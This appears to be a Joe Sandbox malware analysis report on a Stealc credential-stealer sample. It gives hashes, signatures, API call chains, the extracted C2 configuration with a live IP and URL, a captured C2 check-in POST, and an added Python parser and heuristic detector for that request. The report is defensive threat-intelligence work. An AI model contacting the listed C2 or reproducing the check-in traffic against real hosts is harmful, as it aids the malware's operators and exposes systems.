

Windows Analysis Report
ttFpxuMwKz.exe

Overview

General Information

Sample name: ttFpxuMwKz.exe (renamed because the original name is a hash value)
Original sample name: 56f2a1223362b66cca9bf86b7cacad0c.exe
Analysis ID: 1528814
MD5: 56f2a1223362b66cca9bf86b7cacad0c
SHA1: 484699fe4ecde29da1c5c73892881cea2f98eb8a
SHA256: b5a8df0c020433116e2ec77cb313fc9f6d17fa57a8256c41adf5eec6e693e145
Tags: exe, Stealc, user-abuse_ch

Detection

Stealc
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Machine Learning detection for sample
Searches for specific processes (likely to inject)
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
One or more processes crash
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • ttFpxuMwKz.exe (PID: 6480 cmdline: "C:\Users\user\Desktop\ttFpxuMwKz.exe" MD5: 56F2A1223362B66CCA9BF86B7CACAD0C)
    • WerFault.exe (PID: 1672 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6480 -s 804 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 1088 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6480 -s 812 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 6668 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6480 -s 836 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 5860 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6480 -s 844 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 6172 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6480 -s 1040 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 6768 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6480 -s 1052 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 7056 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6480 -s 1052 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 4744 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6480 -s 1336 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relied on other prominent stealers: Vidar, Raccoon, Mars and RedLine. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads seven legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs / Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://62.122.184.144/f88d87a7e087e100.php", "Botnet": "default5_pal"}
Yara matches (Source | Rule | Description | Author | Strings):

PCAP:
  dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security

Memory dumps:
  00000000.00000002.2312364166.0000000000A13000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
  00000000.00000002.2312343251.00000000009E9000.00000040.00000020.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown
    strings: 0xfa0: $a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
  00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
  00000000.00000003.2072891062.0000000000970000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
  00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
  (3 further entries not shown)

Unpacked PE files:
  0.3.ttFpxuMwKz.exe.970000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
  0.3.ttFpxuMwKz.exe.970000.0.raw.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
  0.2.ttFpxuMwKz.exe.7e0e67.3.raw.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
  0.2.ttFpxuMwKz.exe.400000.1.raw.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
  0.2.ttFpxuMwKz.exe.7e0e67.3.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
  (1 further entry not shown)

The Elastic RedLineStealer rule matched on a single 22-byte code sequence at offset 0xfa0, and the Elastic Smokeloader rule on the 0x7E0000 region (both are listed again under System Summary). Since Stealc's code base draws on RedLine and other stealers (see the description above), these hits are more plausibly shared code than a second family; the Stealc verdict rests on the configuration extractor, the family-specific Yara rules and the Suricata C2 check-in alert.
                      No Sigma rule has matched
Suricata alert:
  Timestamp: 2024-10-08T10:18:27.165792+0200
  SID: 2044243
  Severity: 1
  Classtype: Malware Command and Control Activity Detected
  Source: 192.168.2.5:49704
  Destination: 62.122.184.144:80
  Protocol: TCP


                      AV Detection

Source: 00000000.00000003.2072891062.0000000000970000.00000004.00001000.00020000.00000000.sdmp | Malware Configuration Extractor: StealC {"C2 url": "http://62.122.184.144/f88d87a7e087e100.php", "Botnet": "default5_pal"}
Source: Submitted sample | Integrated Neural Analysis Model: matched, 100.0% probability
Source: ttFpxuMwKz.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\ttFpxuMwKz.exe | Code functions using the Enhanced Cryptographic Provider: CryptStringToBinaryA/CryptBinaryToStringA (string-to-binary decoding and encoding) and CryptUnprotectData (DPAPI decryption, the call a stealer needs to open browser-stored secrets). Each sequence appears twice, at 0x40xxxx and again a constant 0x3E0267 higher at 0x7Exxxx, i.e. two mappings of the same unpacked code:
  0_2_0040C820 memset,lstrlenA,CryptStringToBinaryA,memcpy,lstrcatA,lstrcatA,lstrcatA
  0_2_00407240 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree
  0_2_00409AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
  0_2_00418EA0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA
  0_2_00409B60 CryptUnprotectData,LocalAlloc,memcpy,LocalFree
  0_2_007E74A7 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
  0_2_007E9D27 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
  0_2_007F9107 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
  0_2_007E9DC7 CryptUnprotectData,LocalAlloc,memcpy,LocalFree
  0_2_007ECA87 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,lstrcat

                      Compliance

Source: C:\Users\user\Desktop\ttFpxuMwKz.exe | Unpacked PE file: 0.2.ttFpxuMwKz.exe.400000.1.unpack
Source: ttFpxuMwKz.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\ttFpxuMwKz.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: C:\Users\user\Desktop\ttFpxuMwKz.exe | Code functions walking directories with FindFirstFileA/FindNextFileA and copying, then deleting, matching files (again in two copies, at 0x40xxxx and 0x7Exxxx):
  0_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
  0_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
  0_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA
  0_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
  0_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose
  0_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
  0_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
  0_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
  0_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
  0_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose
  0_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
  0_2_007EE077 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
  0_2_007EF8F1 FindFirstFileA
  0_2_007EDCE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
  0_2_007EC0D7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
  0_2_007E1937 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
  0_2_007EF917 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
  0_2_007F4107 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
  0_2_007EE697 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
  0_2_007F4B77 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
  0_2_007F3B17 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
  0_2_007F47D7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
  0_2_007EEF87 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose

                      Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 62.122.184.144:80
Source: Malware configuration extractor | URLs: http://62.122.184.144/f88d87a7e087e100.php
Source: global traffic | HTTP traffic detected:
  GET / HTTP/1.1
  Host: 62.122.184.144
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic | HTTP traffic detected (the C2 check-in: no User-Agent header, and the build field equals the Botnet value of the extracted configuration):
  POST /f88d87a7e087e100.php HTTP/1.1
  Content-Type: multipart/form-data; boundary=----JEBKEHJJDAAAAKECBGHD
  Host: 62.122.184.144
  Content-Length: 219
  Connection: Keep-Alive
  Cache-Control: no-cache

  ------JEBKEHJJDAAAAKECBGHD
  Content-Disposition: form-data; name="hwid"

  DE61FDBADFAD2322695909
  ------JEBKEHJJDAAAAKECBGHD
  Content-Disposition: form-data; name="build"

  default5_pal
  ------JEBKEHJJDAAAAKECBGHD--
  (the report's raw hex dump is omitted here; it decodes byte for byte to the 219-byte body above)
Source: Joe Sandbox View | ASN name: GORSET-ASRU
Source: unknown | TCP traffic detected without corresponding DNS query: 62.122.184.144 (8 occurrences; the C2 is addressed by a hard-coded IP, so there is no DNS lookup to alert on)
Source: C:\Users\user\Desktop\ttFpxuMwKz.exe | Code function: 0_2_00404880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlenA,lstrlenA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
Source: global traffic / unknown | HTTP traffic detected: the same GET / and POST /f88d87a7e087e100.php requests as above, listed a second time with identical headers and body
Source: ttFpxuMwKz.exe, 00000000.00000002.2312303114.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, ttFpxuMwKz.exe, 00000000.00000002.2312364166.0000000000A13000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://62.122.184.144
Source: ttFpxuMwKz.exe, 00000000.00000002.2312364166.0000000000A13000.00000004.00000020.00020000.00000000.sdmp, ttFpxuMwKz.exe, 00000000.00000002.2312364166.0000000000A51000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://62.122.184.144/
Source: ttFpxuMwKz.exe, 00000000.00000002.2312364166.0000000000A51000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://62.122.184.144/f88d87a7e087e100.php
Source: ttFpxuMwKz.exe, 00000000.00000002.2312364166.0000000000A69000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://62.122.184.144/f88d87a7e087e100.php)
Source: ttFpxuMwKz.exe, 00000000.00000002.2312364166.0000000000A51000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://62.122.184.144/f88d87a7e087e100.phpjk
Source: ttFpxuMwKz.exe, 00000000.00000002.2312364166.0000000000A51000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://62.122.184.144/f88d87a7e087e100.phprkJ
Source: Amcache.hve.4.dr | String found in binary or memory: http://upx.sf.net
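The C2 check-in above, decoded and fingerprinted in an added Python example (this is not part of the Joe Sandbox report and not Stealc's or Joe Security's code). CAPTURED_REQUEST is transcribed from the report's POST to /f88d87a7e087e100.php (headers as listed, body decoded from the hex dump); BENIGN_REQUEST and the heuristic in is_stealc_style_checkin() are constructed here and assume that the traits of this single capture (POST to /<16 hex chars>.php, multipart body, no User-Agent, exactly the fields hwid and build) generalise; they are not a published rule.

```python
"""Decode and fingerprint the Stealc C2 check-in captured in this report.

Added example: neither part of the Joe Sandbox report nor Stealc's own code.
CAPTURED_REQUEST is transcribed from the report; BENIGN_REQUEST and the
heuristic in is_stealc_style_checkin() are assumptions made for this example.
"""
import re
from typing import Dict, Tuple

# Extracted configuration exactly as printed in the report.
EXTRACTED_CONFIG = {"C2 url": "http://62.122.184.144/f88d87a7e087e100.php",
                    "Botnet": "default5_pal"}

# Transcribed from the report's "HTTP traffic detected" entry (219-byte body).
CAPTURED_REQUEST = (
    b"POST /f88d87a7e087e100.php HTTP/1.1\r\n"
    b"Content-Type: multipart/form-data; boundary=----JEBKEHJJDAAAAKECBGHD\r\n"
    b"Host: 62.122.184.144\r\n"
    b"Content-Length: 219\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Cache-Control: no-cache\r\n"
    b"\r\n"
    b"------JEBKEHJJDAAAAKECBGHD\r\n"
    b'Content-Disposition: form-data; name="hwid"\r\n'
    b"\r\n"
    b"DE61FDBADFAD2322695909\r\n"
    b"------JEBKEHJJDAAAAKECBGHD\r\n"
    b'Content-Disposition: form-data; name="build"\r\n'
    b"\r\n"
    b"default5_pal\r\n"
    b"------JEBKEHJJDAAAAKECBGHD--\r\n"
)

# Constructed benign upload (not from the report): same multipart framing, but
# it carries a User-Agent and an unrelated field, so the heuristic must not fire.
BENIGN_BODY = (b"--abc\r\n"
               b'Content-Disposition: form-data; name="file"\r\n'
               b"\r\nhello\r\n"
               b"--abc--\r\n")
BENIGN_REQUEST = (b"POST /upload.php HTTP/1.1\r\n"
                  b"Host: example.invalid\r\n"
                  b"User-Agent: curl/8.0\r\n"
                  b"Content-Type: multipart/form-data; boundary=abc\r\n"
                  + b"Content-Length: %d\r\n\r\n" % len(BENIGN_BODY)
                  + BENIGN_BODY)


def parse_http_request(raw: bytes) -> Tuple[str, str, Dict[str, str], bytes]:
    """Split a raw HTTP/1.1 request into (method, path, headers, body).
    Header names are lower-cased so later lookups are case-insensitive."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("no end-of-headers marker")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def parse_multipart(body: bytes, content_type: str) -> Dict[str, bytes]:
    """Return {field name: value} for a multipart/form-data body."""
    m = re.search(r'boundary="?([^";]+)"?', content_type)
    if not m:
        raise ValueError("multipart body without boundary parameter")
    delimiter = b"--" + m.group(1).encode("latin-1")
    fields: Dict[str, bytes] = {}
    for part in body.split(delimiter)[1:]:        # [0] is the (empty) preamble
        if part.startswith(b"--"):                 # closing "--boundary--"
            break
        part_head, _, part_body = part[2:].partition(b"\r\n\r\n")  # strip leading CRLF
        name = re.search(rb'name="([^"]*)"', part_head)
        if name:
            value = part_body[:-2] if part_body.endswith(b"\r\n") else part_body
            fields[name.group(1).decode("latin-1")] = value
    return fields


C2_PATH = re.compile(r"^/[0-9a-f]{16}\.php$")


def is_stealc_style_checkin(raw: bytes) -> bool:
    """Heuristic drawn from this one capture (assumption, not a published rule):
    POST to /<16 hex>.php, multipart body, no User-Agent header (the report flags
    "HTTP GET or POST without a user agent"), exactly the fields hwid and build."""
    method, path, headers, body = parse_http_request(raw)
    if method != "POST" or not C2_PATH.match(path):
        return False
    if "user-agent" in headers:
        return False
    ctype = headers.get("content-type", "")
    if not ctype.startswith("multipart/form-data"):
        return False
    return set(parse_multipart(body, ctype)) == {"hwid", "build"}


def checkin_summary(raw: bytes) -> Dict[str, object]:
    """Pivot-worthy facts from a check-in: path, hwid, build, whether the declared
    Content-Length matches, and whether build equals the config's Botnet value."""
    _, path, headers, body = parse_http_request(raw)
    fields = parse_multipart(body, headers.get("content-type", ""))
    build = fields.get("build", b"").decode("latin-1")
    return {"path": path,
            "hwid": fields.get("hwid", b"").decode("latin-1"),
            "build": build,
            "length_ok": int(headers.get("content-length", -1)) == len(body),
            "build_matches_config": build == EXTRACTED_CONFIG["Botnet"]}


if __name__ == "__main__":
    print(is_stealc_style_checkin(CAPTURED_REQUEST), checkin_summary(CAPTURED_REQUEST))
```

Run it directly to print the verdict and the extracted hwid/build; the same parser can be pointed at requests reassembled from dump.pcap. Because the C2 is reached by bare IP, DNS-based blocking does not apply here; match on the request shape, or on the IP and path pair from the extracted configuration.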

                      System Summary

Source: 00000000.00000002.2312343251.00000000009E9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c, author: unknown
Source: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f, author: unknown
Source: C:\Users\user\Desktop\ttFpxuMwKz.exe | Code function: string function 004045C0 appears 317 times
Source: C:\Users\user\Desktop\ttFpxuMwKz.exe | Process created: C:\Windows\SysWOW64\WerFault.exe -u -p 6480 -s 804
Source: ttFpxuMwKz.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 00000000.00000002.2312343251.00000000009E9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c (reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12)
Source: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f (reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23)
Source: ttFpxuMwKz.exe | Static PE information: section .text: IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engine | Classification label: mal100.troj.evad.winEXE@9/33@0/1
Source: C:\Users\user\Desktop\ttFpxuMwKz.exe | Code function: 0_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
Source: C:\Users\user\Desktop\ttFpxuMwKz.exe | Code function: 0_2_00413720 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\ttFpxuMwKz.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\TUM2QOMO.htm
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6480
Source: C:\Windows\SysWOW64\WerFault.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\3625bb04-e9a9-443a-866c-e42d06968977
Source: C:\Users\user\Desktop\ttFpxuMwKz.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\ttFpxuMwKz.exe "C:\Users\user\Desktop\ttFpxuMwKz.exe"
Source: C:\Users\user\Desktop\ttFpxuMwKz.exe | Process created: C:\Windows\SysWOW64\WerFault.exe -u -p 6480 -s <N>, eight times, with -s 804, 812, 836, 844, 1040, 1052, 1052 and 1336 (one WerFault.exe per crash of PID 6480, matching the process tree above)
Source: C:\Users\user\Desktop\ttFpxuMwKz.exe | Sections loaded: apphelp.dll, wuliwiyixenotafube.dll, msvcr100.dll, sspicli.dll, wininet.dll, rstrtmgr.dll, ncrypt.dll, ntasn1.dll, iertutil.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll (note the random-looking wuliwiyixenotafube.dll among otherwise standard system libraries)
Source: C:\Users\user\Desktop\ttFpxuMwKz.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: Window Recorder | Window detected: more than 3 window changes detected
Source: C:\Users\user\Desktop\ttFpxuMwKz.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll

                      Data Obfuscation

Source: C:\Users\user\Desktop\ttFpxuMwKz.exe | Unpacked PE file: 0.2.ttFpxuMwKz.exe.400000.1.unpack, section rights .text:ER;.rdata:R;.data:W;.tojo:W;.tls:W;.jedemeb:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\Desktop\ttFpxuMwKz.exe | Unpacked PE file: 0.2.ttFpxuMwKz.exe.400000.1.unpack
Source: C:\Users\user\Desktop\ttFpxuMwKz.exe | Code function: 0_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress (run-time import resolution; the report lists this function twice)
Source: ttFpxuMwKz.exe | Static PE information: section name: .tojo
Source: ttFpxuMwKz.exe | Static PE information: section name: .jedemeb
Source: C:\Users\user\Desktop\ttFpxuMwKz.exe | Code functions using push/ret and pushfd/iretd control-flow obfuscation:
  0_2_0041B035 push ecx; ret 0_2_0041B048
  0_2_0040020D pushfd ; iretd 0_2_00400211
  0_2_007FB29C push ecx; ret 0_2_007FB2AF
  0_2_007E0F56 pushfd ; iretd 0_2_007E1078
  0_2_009EE5BA push eax; ret 0_2_009EE5C9
  0_2_009EE5AB push eax; ret 0_2_009EE5C9
  0_2_009EB5DB push 7DD07DC0h; iretd 0_2_009EB5EC
  0_2_009EAAD5 pushfd ; iretd 0_2_009EAAD8
Source: ttFpxuMwKz.exe | Static PE information: section .text entropy: 7.873070673293666 (close to the 8.0 maximum of uniformly random data, consistent with packed or encrypted code)
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX (5 occurrences)
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX (23 occurrences)
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
